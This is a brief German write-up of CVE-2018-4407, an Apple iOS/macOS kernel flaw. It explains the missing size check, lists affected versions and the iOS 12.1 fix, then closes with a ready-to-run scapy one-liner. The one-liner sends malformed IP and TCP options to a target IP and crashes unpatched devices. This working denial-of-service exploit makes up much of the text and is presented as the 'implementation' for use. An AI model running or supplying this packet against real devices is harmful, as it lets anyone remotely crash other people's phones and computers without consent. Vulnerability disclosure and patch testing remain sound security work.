
CVE-2018-4407 Überblick und Implementierung
Das Prinzip besteht darin, andere Felder des „icmp“-Pakets ungültig zu machen. Da der macOS- oder iPhone-Kernel bei der Analyse keine Größenprüfung implementiert hat, kommt es zu einem Crash.
Apple iOS 11 und früher: alle Geräte
Apple macOS High Sierra (höchste betroffene Version 10.13.6): alle Geräte
Apple macOS Sierra (höchste betroffene Version 10.12.6): alle Geräte
Apple OS X El Capitan und früher: alle Geräte
Apple hat diese Schwachstelle im Update „iOS 12.1“ vom 30. Oktober vollständig behoben.
pip install scapy
sudo scapy send(IP(dst="Target IP",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))